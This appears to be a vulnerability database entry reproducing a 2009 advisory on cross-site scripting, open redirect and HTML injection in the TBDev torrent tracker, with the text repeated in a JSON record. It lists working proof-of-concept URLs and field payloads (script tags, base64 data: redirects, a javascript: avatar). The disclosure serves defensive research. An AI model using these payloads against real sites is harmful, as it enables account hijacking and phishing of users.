Search...

TBDev 01-01-2008 Multiple Remote Vulnerabilities

2009-06-12T00:00:00

ID SSV:12958
Type seebug
Reporter Root
Modified 2009-06-12T00:00:00

Description

No description provided by source.

                                        
                                            
                                                TBDev - Cross Site Scripting and HTML Injection Vulnerabilities

Version Affected: 01-01-2008 (16th January 2008) (newest)

Info: TBDEV.NET is a project to further enhance, update and develop a
software (php peer-to-peer) from the original torrentbits/bytemonsoon
source code.

Credits: InterN0T

External Links:
http://www.tbdev.net


-:: The Advisory ::-

Vulnerable Function / ID Calls:
returnto

Cross Site Scripting: (Sysops / Mods Only!)
http://[HOST]/tbdev/tbdev-01-01-08/makepoll.php?returnto=&gt;&lt;script&gt;alert(0)&lt;/script&gt;
http://[HOST]/tbdev/tbdev-01-01-08/polls.php?action=delete&amp;pollid=1&amp;returnto=&gt;&lt;script&gt;alert(0)&lt;/script&gt;&lt;br

Cross Site Script Redirection: (Sysops / Mods Only!)
http://[HOST]/tbdev/tbdev-01-01-08/news.php?action=delete&amp;newsid=1&amp;returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;sure=1

Cross Site Script Redirection: (Anyone, the enduser will need to log in
though)
http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=http://[HOST]
http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

HTML Injection:
1) http://[HOST]/tbdev/tbdev-01-01-08/my.php
-- Info field: &lt;/textarea&gt;&lt;script&gt;alert(0)&lt;/script&gt; &lt;&lt; is reflected
locally only!

2) http://[HOST]/tbdev/tbdev-01-01-08/my.php
-- Avatar field: javascript:alert(0)

2b) Affected Sites by HTML Injection:
http://[HOST]/tbdev/tbdev-01-01-08/userdetails.php?id=USERID

Internet Explorer 6 and perhaps 7 should be triggered by this.
Please see: http://ha.ckers.org/xss.html for more information.
Browser Tested: Internet Explorer 7 (FireFox 3 was tested for the other
vulnerabilities)

-:: Solution ::-
Secure redirection calls with referer headers (just an example) and
filter bad characters.

Conclusion:
This system was fun to find bad code in, it sure had a nice diversity of
vulnerabilities.

Reference:
http://forum.intern0t.net/intern0t-advisories/1121-intern0t-tbdev-01-01-2008-multiple-vulnerabilities.html

Disclosure Information:
- Vulnerabilities found, researched and confirmed between 5th to 10th June.
- Advisory finished and published on InterN0T the 12th June.
- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.


All of the best,
MaXe

# sebug.net

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-12958", "status": "poc", "history": [], "bulletinFamily": "exploit", "modified": "2009-06-12T00:00:00", "title": "TBDev 01-01-2008 Multiple Remote Vulnerabilities", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-12958", "cvelist": [], "description": "No description provided by source.", "viewCount": 0, "published": "2009-06-12T00:00:00", "sourceData": "\n TBDev - Cross Site Scripting and HTML Injection Vulnerabilities\n\nVersion Affected: 01-01-2008 (16th January 2008) (newest)\n\nInfo: TBDEV.NET is a project to further enhance, update and develop a\nsoftware (php peer-to-peer) from the original torrentbits/bytemonsoon\nsource code.\n\nCredits: InterN0T\n\nExternal Links:\nhttp://www.tbdev.net\n\n\n-:: The Advisory ::-\n\nVulnerable Function / ID Calls:\nreturnto\n\nCross Site Scripting: (Sysops / Mods Only!)\nhttp://[HOST]/tbdev/tbdev-01-01-08/makepoll.php?returnto=><script>alert(0)</script>\nhttp://[HOST]/tbdev/tbdev-01-01-08/polls.php?action=delete&pollid=1&returnto=><script>alert(0)</script><br\n\nCross Site Script Redirection: (Sysops / Mods Only!)\nhttp://[HOST]/tbdev/tbdev-01-01-08/news.php?action=delete&newsid=1&returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&sure=1\n\nCross Site Script Redirection: (Anyone, the enduser will need to log in\nthough)\nhttp://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=http://[HOST]\nhttp://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\n\nHTML Injection:\n1) http://[HOST]/tbdev/tbdev-01-01-08/my.php\n-- Info field: </textarea><script>alert(0)</script> << is reflected\nlocally only!\n\n2) http://[HOST]/tbdev/tbdev-01-01-08/my.php\n-- Avatar field: javascript:alert(0)\n\n2b) Affected Sites by HTML Injection:\nhttp://[HOST]/tbdev/tbdev-01-01-08/userdetails.php?id=USERID\n\nInternet Explorer 6 and perhaps 7 should be triggered by this.\nPlease see: http://ha.ckers.org/xss.html for more information.\nBrowser Tested: Internet Explorer 7 (FireFox 3 was tested for the other\nvulnerabilities)\n\n-:: Solution ::-\nSecure redirection calls with referer headers (just an example) and\nfilter bad characters.\n\nConclusion:\nThis system was fun to find bad code in, it sure had a nice diversity of\nvulnerabilities.\n\nReference:\nhttp://forum.intern0t.net/intern0t-advisories/1121-intern0t-tbdev-01-01-2008-multiple-vulnerabilities.html\n\nDisclosure Information:\n- Vulnerabilities found, researched and confirmed between 5th to 10th June.\n- Advisory finished and published on InterN0T the 12th June.\n- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.\n\n\nAll of the best,\nMaXe\n\n# sebug.net\n\n ", "id": "SSV:12958", "enchantments_done": [], "_object_type": "robots.models.seebug.SeebugBulletin", "type": "seebug", "lastseen": "2017-11-19T18:52:01", "reporter": "Root", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments": {"vulnersScore": 4.3}, "objectVersion": "1.4", "references": []}